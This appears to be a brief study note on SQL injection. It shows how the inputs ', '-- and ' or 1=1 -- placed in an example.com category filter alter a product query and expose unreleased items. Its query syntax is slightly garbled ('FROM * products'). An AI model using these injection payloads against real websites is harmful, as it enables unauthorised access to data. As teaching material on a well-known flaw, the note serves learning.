SQLi

Browser:

www.example.com/filter/category=pets

FROM * products WHERE category = 'pets' AND release = 1

from all ( * ) products where category is pets and show released

www.example.com/filter/category='

FROM * products WHERE category =''' AND release=1

error message because extra ’ for category

www.example.com/filter/category='--

FROM * products WHERE category=''--'

-- comments out everything after, so category is empty space category=''

www.example.com/filter/category=' or 1=1 --

FROM * products WHERE category = '' or TRUE ~~AND release=1~~

from all products where category is either none ( ’’ ) OR TRUE, which is TRUE, and shows all products released and unreleased

Public conversation about this article.

Sign in to join the discussion.

No comments yet.

Article metadata